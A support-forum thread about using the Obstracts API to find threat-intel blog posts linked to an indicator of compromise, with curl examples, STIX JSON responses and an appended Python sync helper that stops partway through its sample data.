Building an integration to look up blog posts linked to IoCs

Before I upgrade my account to use the API I want to understand if the following use-case is possible:

  1. In my threat intel platform I have an IoC
  2. I want to get all posts in Obstracts related to that IoC
  3. Periodically I want to sync new posts identified that contain the IoC

Hey @dtp1900!

This is a very common use case; the answer is yes!

Out of interest, what TIP do you use?

Here’s the general logic (I’ll use the directory /sys as a basic example).

1. Get the object's STIX ID

You will know the IoC value, but you first need to identify the ID.

curl -X 'GET' \
  'https://api.obstracts.com/v1/objects/scos/?page=1&types=directory&value=%2Fsys' \
  -H 'accept: application/json' \
  -H 'API-KEY: HIDDEN'
{
  "page_size": 50,
  "page_number": 1,
  "page_results_count": 49,
  "total_results_count": 49,
  "objects": [
    {
      "id": "directory--33bec98a-1619-5e60-8802-474148016c81",
      "path": "/opt/sys/bin/aaaaa",
      "spec_version": "2.1",
      "type": "directory"
    },
    {
      "id": "directory--006bfd99-c377-5717-9168-45787a7b455a",
      "path": "/sys",
      "spec_version": "2.1",
      "type": "directory"
    },

You can now parse out the ID of the object you want (directory--006bfd99-c377-5717-9168-45787a7b455a).

2. Get the bundle for the IoC

You can now filter the Report objects (SDOs) that represent posts linked to that IoC.

curl -X 'GET' \
  'https://api.obstracts.com/v1/objects/directory--006bfd99-c377-5717-9168-45787a7b455a/bundle/?types=report' \
  -H 'accept: application/json' \
  -H 'API-KEY: HIDDEN'
{
  "page_size": 50,
  "page_number": 1,
  "page_results_count": 3,
  "total_results_count": 3,
  "objects": [
    {
      "confidence": 0,
      "created": "2025-07-23T12:00:00.000Z",
      "created_by_ref": "identity--fffc6bd1-39d5-5880-bc08-09fac3aa910f",
      "external_references": [
        {
          "source_name": "txt2stix_report_id",
          "external_id": "1c77e79c-2d16-5200-ae0e-e43f99d06824"
        },
        {
          "source_name": "txt2stix_report_md5",
          "description": "37d6220d8f83633a4a9faa210588b59d"
        },
        {
          "source_name": "post_link",
          "url": "https://www.wiz.io/blog/soco404-multiplatform-cryptomining-campaign-uses-fake-error-pages-to-hide-payload"
        },
        {
          "source_name": "obstracts_feed_id",
          "external_id": "fffc6bd1-39d5-5880-bc08-09fac3aa910f"
        },
        {
          "source_name": "obstracts_profile_id",
          "external_id": "3d9af85e-dc3f-5ac8-951f-aa26ef74086a"
        },
        {
          "source_name": "txt2stix_describes_incident",
          "description": "true",
          "external_id": "openai:gpt-5"
        },
        {
          "source_name": "txt2stix_ai_summary",
          "external_id": "openai:gpt-5",
          "description": "Wiz Research documents the Soco404 cryptomining campaign abusing exposed/misconfigured PostgreSQL and compromised Apache Tomcat (with prior activity against Struts/Confluence) to deploy platform-specific miners for Linux and Windows, delivered via compromised infrastructure and Google Sites-based fake 404 pages. The report details loaders, process masquerading (e.g., sd-pam, kworker), persistence via cron, shell initialization files, and Windows services, log wiping, inter-process communications, use of WinRing0, and active mining to c3pool and MoneroOcean with a specified wallet. It provides extensive IoCs (hashes, domains, wallets, pools) and ATT&CK mappings, and links the operation to a larger crypto-scam web infrastructure."
        }
      ],
      "id": "report--1c77e79c-2d16-5200-ae0e-e43f99d06824",
      "labels": [
        "classification.malware",
        "classification.campaign",
        "classification.indicator_of_compromise",
        "classification.ttp",
        "classification.exploit",
        "classification.cyber_crime",
        "classification.threat_actor"
      ],
      "modified": "2025-07-23T12:00:00.000Z",
      "name": "Soco404: Multiplatform Cryptomining Campaign Uses Fake Error Pages to Hide Payload",
      "object_marking_refs": [
        "marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487",
        "marking-definition--f92e15d9-6afc-5ae2-bb3e-85a1fd83a3b5"
      ],
      "object_refs": [
        "vulnerability--2859a28e-22b9-50c4-ad49-cd48f0d48725",
        "indicator--c68942d4-b667-5ae9-90ff-70cad510c9b6",
        "file--660914cc-4195-5b64-81a4-d721181cf501",
        "relationship--be5257a7-01dc-5e21-85e7-ad15f2c28fb2",
        "indicator--6515552e-cd7a-547b-afbc-25e3440ac454",
        "file--4b486726-3247-567b-86d0-088738a3be06",
        "relationship--00fdc547-e441-5abe-b426-5363e2d22b3d",
        "indicator--be06baec-7350-5256-a5ec-cd8c5137371e",
        "file--a472f3bf-a335-553c-aa57-3497d5ba96fe",
        "relationship--f0d74d7a-7bb8-543a-a963-ea89fdfd9a0e",
        "indicator--f1097c69-7445-5289-88bc-21f8ae9d2ec7",
        "file--ecbc6e81-d737-56fa-9eb1-11c62b4b2be1",
        "relationship--8fcf41b0-9bd0-52d9-9a63-334baccaed52",
        "indicator--c23b98d8-5c67-5e13-b448-e671068525e0",
        "file--2e871aba-9dd8-5665-ac5d-9cb8d3952266",
        "relationship--32b70f7a-b325-5c26-b200-a0fb2456a07e",
        "indicator--6ef3bea4-1b35-5e83-a003-b356d3733038",
        "file--431f165a-5ae3-501f-84c8-bb40988f668c",
        "relationship--6a5e075e-d452-5ac5-8e22-c67bae315ad5",
        "indicator--7d0be6aa-946b-5308-b374-e43226437d2d",
        "file--573e8165-69a9-56b4-95e1-144dcaf1ed55",
        "relationship--fdc475c1-6772-5928-b089-bc7bea2282fa",
        "indicator--3256b688-3fa6-55a9-bdd4-7cbb70968a61",
        "file--00a0c3fb-9126-5a34-be52-fb3551c11045",
        "relationship--728570cf-54d4-56f9-9874-b69e3dffa3b9",
        "indicator--72d4ef8d-3ef4-5600-8f7f-80a5584d16ff",
        "file--7d891376-d766-5db3-ab9c-bab38d1c08e0",
        "relationship--89a44697-46a5-594e-9908-2838c208ae32",
        "indicator--1edd1967-30a7-5fec-8546-930d8d3e357a",
        "file--27181e5b-052d-5109-be94-3683dbf242a2",
        "relationship--3bce1626-64f4-5fed-ad12-85d1a81ee989",
        "indicator--fb3c012b-1eb9-5de5-9b9f-503d35dccbcf",
        "file--f6c50967-bc19-5886-b80f-9d2408bb08db",
        "relationship--513b74a1-8c27-553d-affe-c6656000f7ca",
        "indicator--326e8420-3dde-55e0-8525-93a52d312eaf",
        "file--ea5b6524-f9e6-52af-9213-7db682499127",
        "relationship--c6913b68-32f4-5c06-a476-41e62868d493",
        "indicator--1e20b21b-081e-57d2-98df-9eefe7c67294",
        "file--a0d04578-5185-5601-9ff2-9854d7e2042d",
        "relationship--ef8dd808-7bf0-5af6-9ab9-b042ff98a928",
        "indicator--06261244-f1d7-5c27-9b34-9a736d3c6725",
        "file--6e948bc6-b70b-50d7-b7f5-e586c8f88e46",
        "relationship--f7546f65-2a6b-592d-8ce9-30f0e0a326c7",
        "indicator--6c9edb78-8367-500f-aaa3-c963c3b5d61b",
        "file--4dd86a8d-c412-5154-b5cf-a0ef39971eb2",
        "relationship--c34950de-d012-54e8-b654-8950eddb80c0",
        "indicator--61de77a7-0be8-5905-a2d7-92e800d624ac",
        "file--99c1c8b2-2101-504a-9f97-0b20f4e06b2a",
        "relationship--3546ab51-9569-52b5-aeb8-c604574de4a4",
        "indicator--1ac078d4-761c-5adb-bbfd-3e4f4bfc27a5",
        "file--c84ab80a-2ddc-58fc-b7ed-80b64b47e234",
        "relationship--c55b9838-eb8c-5901-a1ca-4d0531422db8",
        "indicator--69bd3a35-da0a-5ad4-a188-1deb84230e4c",
        "file--eea82830-6ffb-510f-9aa6-ef6c837a0783",
        "relationship--28b44884-a77e-52ba-80d5-61cb8e445fd2",
        "indicator--c370fedc-1cbc-5b79-9118-cf381d9a41a1",
        "file--6ac71a33-b01f-52a2-9c2c-63b7c6547f7a",
        "relationship--28ce86eb-0ae0-5c64-a399-cdd02c8468c1",
        "indicator--644c9604-7d17-5017-9fb2-e29a4745bb6b",
        "file--2d3e06bd-e34f-5d32-8979-3c3207777d06",
        "relationship--fb6dac13-5242-5411-935b-18a13db19a41",
        "indicator--73284855-7303-56df-9c5f-990dff7eb4fb",
        "file--98de85be-ddf8-5eec-8610-e6f7e30826d0",
        "relationship--6e3f400f-d4e9-5f95-b5e6-c54808a4146a",
        "indicator--0c6bc558-c85c-53f8-9639-ceec03f657c4",
        "file--8a8e81bd-a21d-5976-9d59-d2fe8544a441",
        "relationship--28dd613f-d2ee-598b-aac4-0d4da07a9191",
        "indicator--3d88da10-7f03-598c-afcb-50fc0eead681",
        "file--bd270365-db8b-5ca5-9168-d04a25f43a93",
        "relationship--dd40a957-47ae-567e-99e3-3c538f26cf95",
        "indicator--5e75a425-ff1f-5fca-b02e-7fcbf1aee3a0",
        "file--2facd814-e6fc-57f4-aaa0-a104bad49889",
        "relationship--1ce8b7cf-cb90-51a4-9d6f-a156d9a91ce8",
        "indicator--4d7fc969-f1fd-575b-9e35-2922e8bcabc0",
        "file--e40f4918-2657-5113-901a-59ccabe1d3c4",
        "relationship--4821475f-b12b-5c3b-81b4-b4548984d4ca",
        "indicator--0afe20c4-e038-51d5-aede-6747c6971c6c",
        "file--07b53740-fd6a-58e9-8c32-37772ec92c05",
        "relationship--8eae4177-16a1-5bcc-b9cb-bedb8568986a",
        "indicator--05869fb1-8a4e-5b7a-9d3f-45cc0d231b97",
        "domain-name--8ede6429-058c-5f3a-9ae2-5c3038a20c1c",
        "relationship--1d3ea87f-f698-5b73-9639-0829d2a68472",
        "indicator--148e178c-60a0-5338-b48f-10823362f219",
        "domain-name--5b7e06bc-a09b-5ad1-a17d-a9c0f765a3b1",
        "relationship--6bc74c13-5506-56a9-8daa-74f03ea1efab",
        "indicator--77df1318-1548-56bd-95e8-47baa8f05f22",
        "domain-name--9695a0ee-35b7-57d8-bf50-586c07aac6f3",
        "relationship--10f8b37f-7766-5e94-9546-0ed915c3eeb6",
        "indicator--2e285e19-f3b9-5877-89d9-2a643070da2a",
        "domain-name--e889795d-3cb4-5728-bbe9-837f16d69893",
        "relationship--1628302c-6771-5e59-a620-5b9c1c73612c",
        "indicator--b592b740-2a01-5076-8813-f35c205edb70",
        "domain-name--7434e46c-e1d3-5eac-b1a3-ae6f56cb0d2e",
        "relationship--8bfedeba-8648-5913-85e8-f633b235e625",
        "indicator--3dce55fc-65ad-567a-ae76-424a2991cb2a",
        "domain-name--35a35b26-6e2b-51eb-9699-c1f397df4874",
        "relationship--755c3d79-87bb-5d6e-980e-12f27b635e2d",
        "indicator--942fd8a0-d258-5a95-bf08-85217ca54533",
        "domain-name--74f72770-56bc-5595-a16d-04bd86b5237c",
        "relationship--f90ef73a-4450-5b1a-86b2-16f8f91b9bbd",
        "indicator--5ee34923-de79-5cc1-9ba9-0bbdda8bc66d",
        "domain-name--dd686e37-6889-53bd-8ae1-b1a503452613",
        "relationship--4cae20d3-5913-5afa-aea1-c72b8a0a03de",
        "indicator--3c47d4cd-fd91-58a4-bbee-ee9b8eba92c0",
        "domain-name--4890eaaf-953b-5985-a096-9e90f0a27da9",
        "relationship--548b5c59-727d-5a47-b4f7-4bfbe8e070fa",
        "indicator--fe74e627-39e0-5c56-bec1-cb2720ff1ee2",
        "domain-name--5fe44c77-a18b-5f19-bad0-8ceaa66d4e25",
        "relationship--5506ef54-fd31-59a5-a5e8-d9645a87afc3",
        "indicator--c86a814b-9074-5067-b719-9e5a63196393",
        "domain-name--73087b89-df73-57b6-8b83-19d276c39d28",
        "relationship--b114681d-8c99-5bc4-bbc7-9c4560dff438",
        "indicator--6fda002f-0f9a-5a71-9fe9-537b564c6513",
        "domain-name--22f8ee59-c26b-5195-b7f7-e1c7406e54b5",
        "relationship--b1faaa1f-8d28-5bd2-94f9-25f5392737e3",
        "indicator--e4be76c6-22e9-5440-b4fb-93dc9613d7a7",
        "url--4f641666-bd70-5d42-9598-8a170a1872a7",
        "relationship--a842f5bc-1c3d-589e-b6bc-9212aea87bcb",
        "indicator--82358afb-7830-5c6c-bdf7-0d1123ef228d",
        "url--25c40db4-6478-5fd6-9ec0-df8cd3744703",
        "relationship--a75967e4-9c13-5916-8a40-d33286d110db",
        "indicator--93879e0d-f967-5862-b854-83572fed3e28",
        "url--02c0f6a5-5dc3-5453-acc8-0e60d1055ec0",
        "relationship--76c424aa-1e37-5c06-8436-be5ece2b4131",
        "indicator--477b0519-7958-5fcf-850d-ec7ddc0b73a7",
        "url--00b2c680-917a-5f2d-ae99-b06e2dfda9c0",
        "relationship--14604393-8b43-56f3-8b05-5a7e6adb384a",
        "indicator--7a289d58-d6eb-5bd6-a17f-f747be15d63d",
        "url--84e6b675-2f3b-5a12-b01f-4f9085fbf310",
        "relationship--0202c813-5262-5deb-b12b-1db92dde95dc",
        "indicator--a1e8b3d1-ecd4-5ccc-8776-c8cbddf2ac47",
        "url--507de22f-d46d-58ad-ac19-75b7091a019b",
        "relationship--949d92b4-9704-55f5-ad08-0aebfc6cd1b4",
        "indicator--4c472400-5d04-5ce7-a501-ee4e540af177",
        "directory--d9c9c055-8e37-55a1-ba2b-79da4af27256",
        "relationship--7f861d6e-0947-5500-b725-3dae90a6b18f",
        "indicator--3920efb6-c03a-59a2-92bd-c99f64b60b2d",
        "directory--9cbb5121-7a48-5719-8f2f-170809992f9b",
        "file--d0f30fbf-7d0e-5941-b249-0568483f4874",
        "relationship--c78e1856-03a7-5dd5-a811-53b47a54383b",
        "indicator--980363ef-bd61-5d93-8df8-aadb1121fab3",
        "directory--9e0e1d57-0014-5f16-9fe0-ff833515a1e1",
        "file--b5b48763-1742-594c-a093-ee244936d6ab",
        "relationship--4431feec-6e75-5a38-9418-854f8ddda8f4",
        "indicator--17e8ef3a-7e81-5413-b2d4-b05aa8c4956c",
        "directory--a73b6a51-1a7e-5700-b5a0-d0e110f86498",
        "file--e2db2739-0307-5bfa-9fc6-24a871ceca92",
        "relationship--12240918-6aa1-505b-bda1-e63ffe844153",
        "indicator--d37283b2-51d3-51ce-87c5-8e362c40340b",
        "directory--006bfd99-c377-5717-9168-45787a7b455a",
        "relationship--b8cc9560-4f71-5be8-b67c-a5ea6d364215",
        "indicator--8a6894a9-9f32-5e4f-8011-63de44efff0b",
        "directory--9d5142ea-3041-5292-b76f-5b9091552621",
        "relationship--db9a6e66-ad0b-506c-91a7-44ed70463140",
        "indicator--e49938fb-a918-5ca4-bbd0-dfe6c922df44",
        "directory--4bc10abe-bfef-519f-b868-3c43b01a09ff",
        "relationship--01ee1109-c82b-524c-a128-7f07f0f9d459",
        "indicator--865c4ed6-5d94-528f-996a-7b9c5454607e",
        "file--701ea947-183a-5760-a50c-733042751773",
        "relationship--6e7db705-27b2-5c49-9f1e-4d62e7d45724",
        "indicator--b08cd7c8-3b7f-597f-8937-e43e7218d19f",
        "file--efd603df-4375-5db4-a46f-89f6bfcd6495",
        "relationship--8722b54d-e12d-5b96-8860-2f987b6697c0",
        "indicator--fd45bac8-6eb8-510d-8987-89b436959e7b",
        "file--1defde54-a859-5f87-904a-0a1d9e0c49ff",
        "relationship--2326ad25-3d09-533f-8ceb-f256b9c8599b",
        "indicator--f218927a-505c-53ea-a8d6-a36686c619d6",
        "file--c6d89fa6-62d8-5f0d-8ed5-a29ad6013499",
        "relationship--871aabf8-2258-5239-832f-27658d2b74ce",
        "indicator--88abd148-5e30-58ab-822e-ef0c133958d0",
        "file--f68010a1-c511-5ebe-b2ac-288961f4ced6",
        "relationship--0983ef37-0f36-5b7f-827e-9998c4def511",
        "indicator--1db23e90-f420-579e-b333-046e5e7fe284",
        "file--6ececf6f-053c-5c70-b8e5-f9c28b56fc8a",
        "relationship--5e817730-f6f6-59a9-b1a6-63a0ca3325d3",
        "location--a090c7b9-1f8c-51c7-9d4c-f26bce6a4519",
        "location--5367c604-bef1-5c20-afe0-cd8490f1a294",
        "location--49cc6331-3c73-5221-882c-8144b88506e8",
        "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
        "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c",
        "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a",
        "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36",
        "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
        "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
        "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
        "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb",
        "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
        "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
        "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
        "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d",
        "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
        "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
        "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
        "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c",
        "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2",
        "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54",
        "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5",
        "identity--00115286-e08e-569f-815d-6c8b1af0364d",
        "identity--6904c313-735b-5c5e-b8bc-3a3ca6842f0c",
        "identity--76621f33-4f0f-5a79-9367-6523af40a0c9",
        "identity--7f384a02-40c2-5942-b7ab-9d6b538b819c",
        "identity--d259ca3d-0f87-57b3-b737-ebbeb0b20bbd",
        "identity--c62409eb-920c-5cfa-94ae-66b3c77bfc7d",
        "attack-pattern--b53d0eb3-4077-4b2c-acb2-4e629562d86f",
        "attack-pattern--ac869698-83a2-44f1-a288-feeaa87f5bad",
        "attack-pattern--867547bc-ea5a-4362-974f-53456cdce132",
        "attack-pattern--fcdbc3da-ae9c-40bb-a271-5fb6c1859335",
        "attack-pattern--0691115d-4430-446c-9071-1546ac5d17ca",
        "attack-pattern--be7bcceb-c01b-4517-8cd6-18ed958b5563",
        "campaign--2bbc99b2-df8e-4cef-838b-355529bc27b1",
        "course-of-action--773a388a-35a7-4dcd-891b-c45cfdaf484b",
        "course-of-action--6d93c592-78f6-4719-bac8-f820203f822a",
        "course-of-action--4bae5bc6-8626-444c-83c6-939c896c9d00",
        "identity--a1a0cecc-f23d-5946-b4c9-06171be68d66",
        "identity--cf042429-9d3c-5901-8f7d-2fbf6bed10d3",
        "identity--be0fd790-5332-5169-ad57-2de175028f8f",
        "identity--676b2880-02df-5fb1-80a6-5380ca71f376",
        "identity--2bceea2b-3f6e-50e3-8af3-79f971448613",
        "infrastructure--46b65ef0-65e9-45f3-ba54-a6a31c3a7e38",
        "infrastructure--d2e95be0-1eb9-4221-bdf1-fe270b88cf81",
        "infrastructure--5cd98023-aa22-4b77-a625-51522b140fd9",
        "infrastructure--99eb7c61-f168-4150-bb62-784e5476c932",
        "infrastructure--48c20762-c864-4133-aa31-d461942a869f",
        "malware--f9abba60-3c18-412b-b1e8-ed35d7bdfef7",
        "tool--418064a5-0a3d-4d93-8ad6-0e5548033282",
        "tool--c5dd5108-ef5c-4cea-9fdc-a36707308309",
        "tool--fe483283-f26f-4455-ae24-a5a7a2d9a770",
        "tool--f3b4289e-b2b1-4e1f-9cd6-3c43501241a3",
        "tool--33f17bc4-2611-4afe-8d8d-ced2a21dce0c",
        "tool--cb0fbb99-3590-4431-be2e-115be21d6c47",
        "relationship--72489537-f30d-5be2-b5a6-2056c5e83503",
        "relationship--91abb9e9-cc68-555b-86dc-be34115b796f",
        "relationship--cf94e8b1-0d8d-57ba-9342-113358333b44",
        "relationship--781b59a2-4c15-5f18-a921-89f87161e407",
        "relationship--03099f5c-1bb6-56de-8fa9-eb050e732e28",
        "relationship--ddf8a569-dfc9-5203-9197-b4cc23672504",
        "relationship--71b8c8d5-e6ac-5bdd-ab2d-0daf9035d8d3",
        "relationship--f24e608a-0857-5b6e-9f4d-e40c900702cb",
        "relationship--135c0505-a313-5713-9c4a-2396033324e7",
        "relationship--2c2872de-7899-59f5-8093-87c1c05328bf",
        "relationship--6f512092-5f67-5ea1-a286-41fc9baf88f4",
        "relationship--0fbb24bb-0f87-500c-a172-0ce2320fa2c7",
        "relationship--462f3dc1-89c0-51ca-aebb-7c0f3b65c45e",
        "relationship--df1a1677-a19d-5239-8294-23db0cae4c9e",
        "relationship--689b17da-f0e5-5120-a56c-a36dca6ad740",
        "relationship--4cbde12d-9d3b-5fc1-8f8b-eb96b88765da",
        "relationship--2bfc5697-db6c-5cc8-951f-555356a2767a",
        "relationship--ceff2c4f-4aec-5417-bfaf-45a0864e48ed",
        "relationship--72ea6abf-6732-5c39-be78-7e1476835c07",
        "relationship--27cf0d57-5ba7-58e9-9ec0-5614ae523a60",
        "relationship--f00deba6-f37f-5d36-9779-f1d4419f8900",
        "relationship--c81c3fe8-2cee-5b71-8474-571f7d07e438",
        "relationship--20a04640-a6a6-5a89-a25d-bae7e32c8f4a",
        "relationship--ae31fe0f-f4f9-5040-8806-eae9b8a6f591",
        "relationship--c398c7a7-a733-5857-a015-ba6b6b4f7623",
        "relationship--2fea314c-64b5-5c4d-9449-76483dd2a709",
        "relationship--c530ef3d-a919-5668-ae57-2a7a77b4db50",
        "relationship--dee17256-bf3a-55de-9ee2-30ec0231f48c",
        "relationship--4bacf3ec-d204-5128-aeea-5ac5c2b7043f",
        "relationship--85c4b73e-490e-5521-9d1c-5a74d786d212",
        "relationship--9b4d2da0-d20b-57b2-ad43-66fb8e5bffe0",
        "relationship--1c1d8f75-5d8c-5ab9-9b56-8001bc0f98e5",
        "relationship--4885491c-13e7-55cf-864d-d6ae620c6260",
        "relationship--0ab923d9-5b0f-52ba-a662-ff57f38d0b27",
        "relationship--80124db2-7891-5956-b4e3-dcaa21f4f001",
        "relationship--d3f3acaa-711e-55c5-99ca-e53cc9ddf881",
        "relationship--e7797ec4-a1f5-5375-9920-97235d2d7efc",
        "relationship--cd50927e-e97a-5cd0-adfa-1310ae941ad2",
        "relationship--d1e0fdde-c9e9-5934-8aa3-918d3aec0c3c",
        "relationship--2a657cde-105a-5581-ada2-03d224688257",
        "relationship--1b0fd67a-1e1a-50fd-9a1d-43315af7b6f1",
        "relationship--22c1c01d-6531-5103-8453-78385923ac61",
        "relationship--2407af07-9ebf-5aa2-b37f-c3468500116f",
        "relationship--aa7370b2-e284-5a2a-954f-815b6e338eb6",
        "relationship--a73104e2-f989-5cad-9fd5-b9ec0a593c43",
        "relationship--ae2fa97e-6de0-5752-9e75-07e0b29a0127",
        "relationship--1b46da09-b0f8-512d-ae6e-84ba9a467914",
        "relationship--a13802e1-2057-58e6-a979-8a8ee3b7827e",
        "relationship--1963b82c-046b-5cec-9096-7fb8de0785ad",
        "relationship--efbfe202-125d-523f-a1fc-7235fb8d804b",
        "relationship--c0d877d7-dd7d-5e5d-b2de-979a9d6bfa18",
        "relationship--26d56477-61ad-591e-bba2-a5b28b5398a7",
        "relationship--ca8e8364-1c20-5285-88b2-18d6b3ca093b",
        "relationship--432fa596-2c23-5a77-8eb1-13eded5b3bc2",
        "relationship--d8f083fe-43ad-5e86-8eac-8caebad1da30",
        "relationship--b6867239-9772-5a61-8576-590277155f57",
        "relationship--22921922-1c9f-5726-a1c7-2e46c8b93b1a",
        "relationship--62f4c7fd-73f6-583f-8a5f-e106b9493a91",
        "relationship--d00e6663-8726-5de1-803e-cf44e558d58f",
        "relationship--86cec3bf-ede5-5515-8b4b-9f7340a49c86",
        "relationship--91c483fb-2ed2-5080-afd5-6e80ced0bb04",
        "relationship--20159747-89c7-50fe-b138-7fcfe285f11b",
        "relationship--6de3c75e-c7a9-5a02-ac2c-f3a9c24e012f",
        "relationship--9c942d00-d3a5-55f0-9e3f-85b476bcc24b",
        "relationship--58f5a4cb-fb65-5209-8168-02771a179a58",
        "relationship--3d651015-833c-5dc1-a128-13299ea2dac9",
        "relationship--51f6e254-f385-568c-bd8f-8b182163a8dd",
        "relationship--38e29885-8f18-5883-bcd7-f0b870d7e2e1",
        "relationship--3233e22b-f72b-5ad6-a76c-668179b397e5",
        "attack-flow--280aec03-6c7d-54d0-87f9-cbe98058f47f",
        "relationship--75e734dd-00a3-5512-945f-0049efda481f",
        "x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400",
        "attack-action--27a2cfda-acad-5b89-ae9f-12235ae137a7",
        "x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263",
        "attack-action--05a1bdad-840f-58a0-9d5e-16c92d238d69",
        "attack-action--3b4d1bed-9007-51c4-9349-c39cc9cbb826",
        "x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca",
        "attack-action--3ae71fee-ad7b-5291-ab6e-50776fb67c13",
        "x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5",
        "attack-action--03f5e6c8-4d18-591b-ba7d-6f4ef9a55ae2",
        "x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813",
        "attack-action--d900c6a5-76b6-5e18-ac0c-18fac07d1924",
        "x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a",
        "attack-action--988f34ca-b6f7-5afd-88c9-3aa58033196d",
        "attack-action--d2a2ac03-e5cf-5086-b223-3fc39843cfa3",
        "attack-action--67af6809-6b89-5b74-a5be-68c25d27f454",
        "attack-action--0c78108e-adb0-5070-8fb5-9a2229ccb060",
        "attack-action--d50f3a64-695d-5f7e-bffb-86dc6cb6c047",
        "attack-action--ef6e6421-2eea-5c46-8013-762124c0234d",
        "x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92",
        "attack-action--8d11404b-9f2c-58d6-9ec1-77e2058fcfd9",
        "attack-action--3326e44e-e10c-5b3d-8e3d-088885eb2205",
        "attack-action--35ac534a-313b-5a60-bd3d-7cfe20fbe252",
        "attack-action--4b0c7736-8ab8-5067-a0b9-7e7193869cb5",
        "attack-action--ad71338a-be45-56cb-8371-3bca4f660678",
        "attack-action--c28d62ac-dad4-5912-96fd-b3fcf51a6d16",
        "x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8",
        "attack-action--62914ca2-1b87-5b86-b293-9834c851412e"
      ],
      "published": "2025-07-23T12:00:00Z",
      "spec_version": "2.1",
      "type": "report"
    },

@dgreenwood-dogesec thanks!

Is it possible to do an exact match on 'https://api.obstracts.com/v1/objects/scos/?page=1&types=directory&value=%2Fsys'?

Your search returns 49 results. Ideally I only want one returned so that I don’t have to add any additional logic to parse the ID.

It’s not right now (and it should be!)

I am going to add this to our backlog with the aim of shipping it before the end of 2025 :folded_hands:
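The three-step flow from the thread (resolve the IoC to a STIX ID, pull the `report` objects from its bundle, then re-run periodically and keep only what is new), with the exact match done client-side since the `value` filter is a contains-match for now. This is an added Python example, not Obstracts' own client code: the endpoints, headers and paging fields (`page_size`, `page_number`, `page_results_count`, `total_results_count`) are taken from the responses shown above; the sample SCOs are trimmed from the thread's output, while the report IDs, the page size of 2 and the `fake_fetcher` stand-in are constructed for the example.

```python
"""Client-side lookup/sync helpers for the Obstracts flow in the thread.

Added example, not Obstracts' own client library. Assumes only the two
endpoints and the paging fields visible in the thread's responses.
"""
import json
import urllib.parse
import urllib.request
from typing import Callable, Iterator

API_BASE = "https://api.obstracts.com/v1"
Fetcher = Callable[[str], dict]  # GET a URL, return the parsed JSON body

# STIX 2.1 property that carries the observable value, per SCO type
# (file objects also carry "hashes"; matching on those is out of scope here).
VALUE_PROPERTY = {
    "directory": "path", "file": "name", "domain-name": "value",
    "url": "value", "ipv4-addr": "value", "ipv6-addr": "value", "email-addr": "value",
}


def http_fetcher(api_key: str) -> Fetcher:
    """Real fetcher: same accept / API-KEY headers as the thread's curl calls."""
    def fetch(url: str) -> dict:
        req = urllib.request.Request(
            url, headers={"accept": "application/json", "API-KEY": api_key})
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    return fetch


def iter_pages(fetch: Fetcher, path: str, params: dict) -> Iterator[dict]:
    """Yield every object across all pages of a paged Obstracts endpoint."""
    page = 1
    while True:
        query = urllib.parse.urlencode({**params, "page": page})
        data = fetch(f"{API_BASE}{path}?{query}")
        yield from data.get("objects", [])
        covered = data["page_number"] * data["page_size"]
        if data["page_results_count"] == 0 or covered >= data["total_results_count"]:
            return
        page += 1


def find_sco_id(fetch: Fetcher, sco_type: str, value: str) -> str:
    """Resolve an IoC value to its STIX ID by exact match on the value property.

    The server-side `value` filter is a contains-match (the thread's /sys query
    also returns /opt/sys/bin/aaaaa), so the exact comparison happens here.
    Zero or several exact hits raise LookupError instead of guessing.
    """
    prop = VALUE_PROPERTY[sco_type]
    objs = iter_pages(fetch, "/objects/scos/", {"types": sco_type, "value": value})
    ids = sorted({o["id"] for o in objs if o.get("type") == sco_type and o.get(prop) == value})
    if len(ids) != 1:
        raise LookupError(f"{len(ids)} exact matches for {sco_type} {value!r}: {ids}")
    return ids[0]


def report_ids_for(fetch: Fetcher, sco_id: str) -> dict:
    """Map report STIX ID -> published timestamp for every post citing the SCO."""
    objs = iter_pages(fetch, f"/objects/{sco_id}/bundle/", {"types": "report"})
    return {o["id"]: o.get("published") for o in objs if o.get("type") == "report"}


def sync(fetch: Fetcher, sco_type: str, value: str, seen: dict) -> dict:
    """One periodic run: return reports not yet in `seen` and record them.

    `seen` (report id -> published) is the caller's persistent per-IoC state,
    e.g. stored against the indicator in the TIP between runs.
    """
    sco_id = find_sco_id(fetch, sco_type, value)
    new = {rid: pub for rid, pub in report_ids_for(fetch, sco_id).items() if rid not in seen}
    seen.update(new)
    return new


# --- Constructed sample data: SCOs trimmed from the thread, report IDs made up ---
SAMPLE_SCOS = [
    {"id": "directory--33bec98a-1619-5e60-8802-474148016c81", "path": "/opt/sys/bin/aaaaa",
     "spec_version": "2.1", "type": "directory"},
    {"id": "directory--006bfd99-c377-5717-9168-45787a7b455a", "path": "/sys",
     "spec_version": "2.1", "type": "directory"},
]
SAMPLE_REPORTS = [
    {"id": "report--00000000-0000-4000-8000-000000000001", "type": "report", "published": "2025-07-23T12:00:00Z"},
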